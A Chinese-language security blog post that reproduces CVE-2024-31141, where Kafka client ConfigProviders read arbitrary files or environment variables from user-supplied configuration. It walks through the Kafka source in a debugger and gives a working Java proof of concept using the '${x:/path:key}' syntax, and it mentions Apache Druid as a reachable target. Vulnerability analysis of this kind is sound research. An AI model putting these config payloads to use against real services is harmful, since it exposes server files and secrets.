早上 chen 发我看了漏洞,官方昨晚发的公告,精简内容如下
xCVE-2024-31141: Apache Kafka Clients: Privilege escalation to filesystem read-access via automatic ConfigProvider
Severity: moderate
Apache Kafka客户端接受用于自定义行为的配置数据,并包含ConfigProvider插件来操纵这些配置。Apache Kafka还提供FileConfigProvider、DirectoryConfigProvider和EnvVarConfigProvider实现,其中包括从磁盘或环境变量读取的能力。
在不受信任的一方可以指定Apache Kafka客户端配置的应用程序中,攻击者可能会使用这些ConfigProvider读取磁盘和环境变量的任意内容。
特别是,Apache Kafka Connect中可能会使用此缺陷将REST API访问升级为文件系统/环境访问,这在某些环境中可能是不理想的,包括SaaS产品。
建议使用受影响应用程序的用户将kafka客户端升级到版本>=3.8.0,并设置JVM系统属性“org.apache.kafka.automatic.config providers=none”。
看完有一个问题:什么情况下 KAFKA 的 CLIENT 配置是可控的,第一种是直接写代码,代码连接

代码如果可控,自己读自己,这显然不是漏洞
第二种情况是:其他开源项目支持链接,通过 WEB 方式连接 KAFKA
用户本来应该只有使用 KAFKA CLIENT 的能力,没有读取文件的能力,如果能够读取,这的确是漏洞
例如下图这样:Apache Druid (图中 Consumer properties 配置可控)

以及某些非开源的商业平台(图中 Add configuration option)

看下来这个漏洞和 JDBC 系列的漏洞类似,都是由 CLIENT 端触发
不同的是,MySQL JDBC 系列漏洞需要连接恶意服务端才可触发,而 KAFKA CLIENT 测试仅本地就可以触发
分析的入口看 org.apache.kafka.automatic.config.providers 配置
在 github 按照这样搜索即可:
xxxxxxxxxxrepo:apache/kafka "org.apache.kafka.automatic.config.providers"
关键变量是 AUTOMATIC_CONFIG_PROVIDERS_PROPERTY
现在 Github 很先进,右侧就能看到相关引用

跟踪到 org.apache.kafka.common.config.AbstractConfigTest.java 测试文件
看到类似这样的代码片段
xxxxxxxxxxSystem.setProperty(AbstractConfig.AUTOMATIC_CONFIG_PROVIDERS_PROPERTY, MockFileConfigProvider.class.getName());Properties providers = new Properties();providers.put("config.providers", "vault");providers.put("config.providers.vault.class", MockVaultConfigProvider.class.getName());providers.put("config.providers.vault.param.key", "randomKey");providers.put("config.providers.vault.param.location", "/usr/vault");Properties props = new Properties();props.put("sasl.truststore.key", "${vault:/usr/truststore:truststoreKey}");props.put("sasl.truststore.password", "${vault:/usr/truststore:truststorePassword}");props.put("sasl.truststore.location", "${vault:/usr/truststore:truststoreLocation}");
结合公告分析,文件读取,使用 ConfigProvider 读取
于是找到源码,查看接口实现,有以下三种,猜测是文件、目录、环境变量

准备代码,我们进行测试,使用一个比较新的 KAFKA CLIENT
xxxxxxxxxx<dependency> <groupId>org.apache.kafka</groupId> <artifactId>kafka-clients</artifactId> <version>3.6.1</version></dependency>
测试代码使用的是 MockVaultConfigProvider 专门为测试实现的类(这里不提了可以进去看下)
xxxxxxxxxxproviders.put("config.providers.vault.class", MockVaultConfigProvider.class.getName());我们使用 FileConfigProvider 类
xxxxxxxxxxpublic static void main(String[] args) { Properties providers = new Properties(); // 必要的配置项 providers.put("bootstrap.servers", "localhost:9092"); providers.put("key.serializer","org.apache.kafka.common.serialization.StringSerializer"); providers.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer"); // 参考上文我们使用 x 而不是 vault providers.put("config.providers", "x"); // 使用 FileConfigProvider 类 providers.put("config.providers.x.class", FileConfigProvider.class.getName()); providers.put("config.providers.x.param.key", "randomKey"); providers.put("config.providers.x.param.location", "/usr/vault"); Producer<String, String> producer = new KafkaProducer<>(providers);}一开始我以为读取的文件是 param.location 属性,所以是这样写的
给 FileConfigProvider 三处方法下断点,进行测试

第一步进入的是 configure 方法

继续跟下去可以发现得到一个 map [string -> ConfigProvider] 的对象,进入 transform 方法

这里在遍历我们配置的每一个选项,例如 bootstrap.servers

跟进去有一个 getVars 的方法,这个 DEFAULT_PATTERN 是这样的
xxxxxxxxxxDEFAULT_PATTERN = Pattern.compile("\\$\\{([^}]*?):(([^}]*?):)?([^}]*?)\\}");这东西和 Log4j 挺像,Java 的框架都喜欢用 ${a:b:c} 做一些事情
这里的 getVars 的意思是,从我们配置的每一个 k-v 取出 v 里 ${a:b:c} 中的部分
最后得到一个包装的类,上面的 a:b:c 分别是 providerName:path:variable 三个属性,保存到 keysByPath 这个 Map 中

接下来的代码遍历所有的 ConfigProviders 然后遍历上文得到的 keysByPath

调试到这里可以发现,其实读文件的不是 config.providers.x.param.location 配置
而是一种类似 ${providerName:path:variable} 的语法
于是构造出下方这样的配置
xxxxxxxxxxProperties providers = new Properties();providers.put("bootstrap.servers", "localhost:9092");
providers.put("key.serializer","org.apache.kafka.common.serialization.StringSerializer");providers.put("value.serializer","org.apache.kafka.common.serialization.StringSerializer");
providers.put("config.providers", "x");providers.put("config.providers.x.class", FileConfigProvider.class.getName());
providers.put("test", "${x:/x.properties:key}");Producer<String, String> producer = new KafkaProducer<>(providers);providerName 显然应该是 x
path 我们在根目录下新建一个 x.properties 内容是 key=secret

断点后成功进入 provider.get 方法,看到其中读文件的方法

返回到最上层,通过一些调试手段,可以看到 KAFKA CLIENT 成功读取到了本地的文件配置信息

当你使用 3.8.0 最新版时可以发现有了一个白名单

到这里我们已经复现了漏洞,有几处思考
(1)现在是一种盲读,怎么回显
我猜测一些平台会显示具体的日志信息,师傅们可以尝试看看
(2)是否还有漏洞
按照 JDBC 的思路卷一波,说不定还有活